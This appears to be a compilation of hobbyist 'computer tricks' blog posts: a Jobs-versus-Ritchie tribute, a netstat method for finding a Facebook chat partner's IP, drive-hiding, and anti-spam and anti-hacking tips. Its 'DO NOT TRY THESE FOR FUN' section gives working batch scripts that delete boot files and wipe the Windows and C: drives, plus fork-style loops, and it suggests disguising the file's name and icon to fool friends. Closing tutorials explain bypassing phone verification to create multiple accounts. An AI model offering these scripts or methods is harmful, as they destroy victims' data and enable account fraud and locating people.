Steve Jobs Vs Dennis Ritchie

✔ Without Steve Jobs (February 24,
1955 – October 5, 2011) we would
have:
• No iProducts.
• No over expensive laptops.
✔ Without Dennis Ritchie
(September 9, 1941 – October 9,
2011) we would have:
• No Windows.
• No Unix.
• No C.
• No Programs.
• A large setback in computing.
• No Generic-text Languages.
• We would all read in Binary.
✔ They died in the same year and
the same month but it seems only
few notice the death of Dennis
Ritchie compared to Steve Jobs.
✔ It won't cost you anything to
press the share button so spread
it ! :)
Both are amazing .... people should
be knowing of both.
:Respect For Both:

How To Get Ip Address On Facebook..?


I will tell you how to get Friends Ip through Facebook.

Steps:

1. First invite or ping that person for a chat on facebook .

2. Make sure your all other tabs in browser and other services in computer are closed. If Possible for you then delete all the cookies-cache and browsing history from your browser.

3. While chatting on Facebook go to Start >- Run >- cmd .

4. After Opening command Prompt Type netstat -an command and hit Enter.

5. Now you will get Ip Address of all the established connections there .

6. Note all the suspicious Ip’s and trace user using ip address tracer sites like whatismyip or www.ipmango.com .

It’s Done Enjoy… :)

You can also find ip of your frineds on Skype, gtalk and Yahoo Messenger using same trick..

Hide Your Total Hard Disk


You may often seen in cyber cafe‘s, Offices and in colleges that in my computer there is only C drive is visible and other drives are hidden. I ask some people that why only c drive is visible where are others and the answers I got were pretty funny listed below: -


1.May Be They Have only 5GB of Hard Drive.
2.Actually They Hide the other drivers but I don‘t know how?

3.We Have Windows In C Drive That is why only c drive is showing there.

Well Well Well In the above three answers second answer is close to the reality actually what happens the administrator of the computer hides the other drives so that students in colleges or employees in offices can not see the full harddisk or other data stored in the D,E, or F drive.

So how it is done lets see.

Step 1:- First type gpedit.msc on run and press enter.

Step 2:- Go to second option in User Configuration and follow the path

Step 3: Click On Windows Explorer

Step 4:- After Clicking on Windows Explorer go to right handside there is a option Hide These Specified drives in My Computer

Step 5:- Open It and Select Enable by default it is in not configured Mode.

Step 6:- After Ok And apply your all hard drives in my computer will be hidden.

Protect Email Accounts From Spam


The following methods can be used to combat email spam.


1. Use spam filters for your email account. If you‘re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by default. Each Spam filter has it‘s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.

2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.

3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead signup for a dummy email account and use this for surveys and feedback forms.

4. While posting your contact email address on your website use this format: emailaddress [at] mysite.com instead of emailaddress@mysite.com. This protects your email address from being indexed by spam bots.

5. Do not respond to unknown messages. When you receive a unknown email, avoid forwarding it to your friends. Examples of unknown messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use ―Bcc‖ (blind certified copy) option to send the email. This will hide all the email IDs to which the mail is forwarded.

5 Ways To Avoid Being Hacked



Hacking. We often think of it happening to companies or governments. But it also happens to ordinary people. But we can take steps to stop it.


Step 1: Tough passwords
You need to have a separate password for each account, so that if one account gets hacked, all of your vital information is not vulnerable. The problem is that it's tough to remember dozens of passwords. The answer: a password manager. There are a variety of third-party software programs that will create and store passwords for you.

Step 2: Two-Part Authentication
When you log on to many different computers — especially shared computers — to access your email account, you are especially vulnerable to hackers.
Many websites are moving toward two-step verification. Google is one. Essentially, it means that you need more than a password to log into a new account. If you use the service, you have to remember a password but also remember a special key that gets sent to you as a text.

Step 3: Change Your Behavior
"I hate to say it, but the reality is they need to share a little bit less," says Ulanoff.
Ulanoff says we probably don't want to go back to the pre-social media days, but oversharing may not be just embarrassing, it may cause harm. Things like birth dates and graduation years can be used to access your information. That doesn't mean you need to shut down your online presence, but be careful what details you put out there.

Step 4: Consolidation
Remember Friendster? Or MySpace? Whitson Gordon, senior editor of Lifehacker.com, says that back in the early days of the Internet, it would have been hard to imagine "10, 20 years down the road when we would have so many services we're grappling with."
So sit down and think about the last 10 years of your online life. And then delete the accounts for the services you signed up for and no longer use.

Step 5: Back It Up
"If there's one thing I have to hammer home with everybody, it's back up your data," Gordon says. You can either use an external hard drive or an online service. As more of the things we care about get stored electronically, the more vulnerable they are to get lost. If your smartphone gets stolen with wedding photos on it, there won't be as much heartbreak.

DO NOT TRY THESE FOR FUN !!

1. How to create more than 3,000 folders under a minute

1) Open your notepad and type the following code.

@echo off
:top
md %random%
goto top



2) Save it as 1000.bat

@echo off makes your screen appear blank but it is actually making hundreds of folders.

md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.






NOTE: The folders will get created in the directory where you saved the ”1000.bat” file.

The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus.

—————————————————————————————————————————————–
2. How to Shutdown a computer forever?!



Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.



DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.

Here’s an alternative code.

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

Paste it in NotePad And Save It with Extension .cmd or .bat.

—————————————————————————————————————————————–


3. How to Delete all your system files with a small command!



Copy the following code into your notepad and save it as a .bat file.

del *.*

All your files in your hard disk will vanish in less than 5mins.

—————————————————————————————————————————————–


4. RAM crashing trick



open notepad and type

:A
start www.learnhowto.in
goto A

save with .bat extension.
Infinitely loops your browser to open up learnhowto.in
—————————————————————————————————————————————–



ALL THE ABOVE TRICKS HAVE TO BEEN TRIED AT YOUR OWN RISK. WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED… ENJOY!

How to Bypass Phone Verification

Description
---------------

This tutorial will help you bypass phone verification on any website, this can be useful when you need to use a phone number to sign up to a site and do not feel comfortable giving your real phone number, or if you want to make multiple accounts.

Step-by-Step Tutorial
-----------------------------

1) Sign up to Tpad at the following link:

https://secure.tpad.com/signup/

2) You will then receive an email with your Tpad number and your email verification link. It will say "Your Tpad number is 1752xxx.".

Verify your email and save your Tpad number.

3) You must now download the Tpad program, you can download it using this link:

http://www.tpad.com/downloads/ninja-dl.php

4) You must now go to ipkall.com and register with the following details:

Select all
Choose your account type: SIP
Choose Area Code for your IPKall Number: 253
SIP username: Your Tpad number
Hostname or IP address: sipx.tpad.com
Email Address: Your email
Password: Pick a password
# of Seconds to ring before hanging up: 120

You will then receive a number by email, this is the number you use on the phone verification. The email will say:
"Thank you for signing up. Your IPKall phone number is: 253-802-0xxx."

5) Open the Tpad program, and enter your Tpad number and password. Wait for the phone verification call.

Verify phone calls -(sms/call)

Things you will learn in this tutorial:

1. How to verify automated calls that provide Code
2. For those who dont live in USA, will have a USA phone number to verify.
3. Works with calls and sms.
4. BONUS: Call free to any USA phone (unlimited talk time)!

First of all, I assume that you dont live in USA and have some site that needs a usa phone number to verify your identity (example: ebay.com)
Here you will have your own USA phone number to provide at the site and accept voice call and smss.
Lets get started!

Step 1:
1. Goto
https://mdns.sipthor.net/register_sip_account.phtml
2. Create an account.
3. Check your email for the sip login details and password.
4. Save it for now, we will need it later.

Step 2:
1. Download this SIP client:
http://www.nch.com.au/components/talksetup.exe
2. Setup the application, dont choose any add-on during the installation, you wont need those.
3. After finishing the setup, click I already have a sip account
4. Enter your details to setup your client. And now it will test your internet. You will need some ports unblocked (I dont remember which ports). If the port is open then the application will run correctly and tell you everything is OK.

Verification works in two ways, i will explain the two ways here. 1. Automated voice call, 2. Automated SMS with code

Step 3: (This step is for voice call)
1. Goto
https://www.tropo.com/
2. Register for an account. Its free.
3. Now goto applications.
4. Click Create New Application and chose Tropo Scripting
5. Give any name to your application. I gave eBay.
6. Now click on Hosted file and then click Create a new hosted file for this application
7. On the file name, write any name with php extension. I wrote ebay.php
8. Now paste this code on the second box:

Code: Select all
answer();
transfer("sip:your_sip_info@sip2sip.info");
?>

9. Replace your_sip_info with the username you register earlier.
10. Click Create file.
11. You will see your application now. Click on Add a new phone number
12. You will see to drop-down boxes, click the box right to US and Canada Local Numbers. Chose your favorite USA city. And click on the plus button
13. You will see a phone number added to your application. Write this phone number down. This is your personal USA number.
14. Youre done! Whenever someone call you on the USA phone number, it will redirected to your SIP client installed on your desktop! You will need microphone and headphone to talk.

Step 4: (This step is for SMS code)
1. Create a new application on tropo.
2. Put this code on your application:

Code: Select all
$myID = $currentCall->callerID;
$myVarible = $currentCall->initialText ;

message("New SMS FROM: ".$myID." --- ".$myVarible."---", array(
"to" => "+155",
"network" => "SMS"));
hangup( );
?>

3. Replace your phone number with international code. Like +155
4. Add a phone number.
5. Youre done! Whenever any one sends a sms on your USA number, it will be forwarded to your real phone !